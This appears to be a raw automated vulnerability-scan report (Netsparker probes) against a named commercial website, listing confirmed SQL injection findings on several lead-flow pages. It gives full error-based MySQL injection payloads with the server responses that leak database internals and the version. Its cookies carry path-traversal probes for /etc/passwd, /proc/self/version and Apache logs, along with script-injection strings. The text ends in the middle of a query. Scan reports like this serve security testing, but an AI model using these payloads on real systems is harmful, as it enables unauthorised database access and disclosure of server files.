GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hg8g6kep5lprpe7rest98lu0c4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lgds00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q1hi3t6n4n69hivo1d4evbe9l4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/phsy00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rpruebc941c547gklms4fomoh6; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+(select 1 and row(1,1)>(select 